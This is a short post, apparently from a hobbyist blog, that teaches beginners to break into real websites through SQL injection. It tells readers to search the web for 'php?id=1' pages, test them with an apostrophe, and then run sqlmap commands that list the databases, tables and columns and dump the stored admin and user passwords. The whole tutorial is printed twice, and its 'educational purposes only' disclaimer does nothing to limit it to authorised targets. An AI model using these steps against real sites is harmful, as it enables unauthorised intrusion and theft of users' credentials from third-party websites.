~How to hack websites(vulnerable ones)~
What you need:
1) Kali Linux(same as Bactrack r3) Download:
kali.org Download the .iso file
2) A virtual machine(VM Box) Google It.
Istall everything(Duh)
And now when you got everything setup
head over to your LeafBrowser(Has a green leaf for icon) and in search type "php?id=1"
Without quotes ofcorse. Ok, when you open up a website in the end of the URL type ' (apostrophe). If it says something like "You have a SQL syntax error" it is vulnerable you can see its database and other cool stuff. NOW FOR THE HACKING PART:
Open the terminal and type "sqlmap -u <vulnrable site adress> --dbs" again...without quotes. It will take a moment to find the database and when it does you can see for example the admin password and user passwords. Now to open up the database
2) Type in the terminal "sqlmap -u <URL> -D <database name> --tables"
Now this is the cool part now you will see alot of cool stuff like user passwords and stuff...
3) Now lets see whats inside of the tables
Command "sqlmap -u <URL> -D <database name> -T <table name> --columns"
4) When you found that column that you think has some info lets open it up.
Command "sqlmap -u <URL> -D <database name> -T <table name> -C <column name> --dump" Aaaand you're done!
CONGRATS! You learned something new today.
DISCLAMER: I and everyone on this page is not responsible for what you do! This is for educational purposes only!!
Leave a like!
U MAY LIKE OUR FB PAGE like emoticon
What you need:
1) Kali Linux(same as Bactrack r3) Download:
kali.org Download the .iso file
2) A virtual machine(VM Box) Google It.
Istall everything(Duh)
And now when you got everything setup
head over to your LeafBrowser(Has a green leaf for icon) and in search type "php?id=1"
Without quotes ofcorse. Ok, when you open up a website in the end of the URL type ' (apostrophe). If it says something like "You have a SQL syntax error" it is vulnerable you can see its database and other cool stuff. NOW FOR THE HACKING PART:
Open the terminal and type "sqlmap -u <vulnrable site adress> --dbs" again...without quotes. It will take a moment to find the database and when it does you can see for example the admin password and user passwords. Now to open up the database
2) Type in the terminal "sqlmap -u <URL> -D <database name> --tables"
Now this is the cool part now you will see alot of cool stuff like user passwords and stuff...
3) Now lets see whats inside of the tables
Command "sqlmap -u <URL> -D <database name> -T <table name> --columns"
4) When you found that column that you think has some info lets open it up.
Command "sqlmap -u <URL> -D <database name> -T <table name> -C <column name> --dump" Aaaand you're done!
CONGRATS! You learned something new today.
DISCLAMER: I and everyone on this page is not responsible for what you do! This is for educational purposes only!!
Leave a like!
U MAY LIKE OUR FB PAGE like emoticon
Post a Comment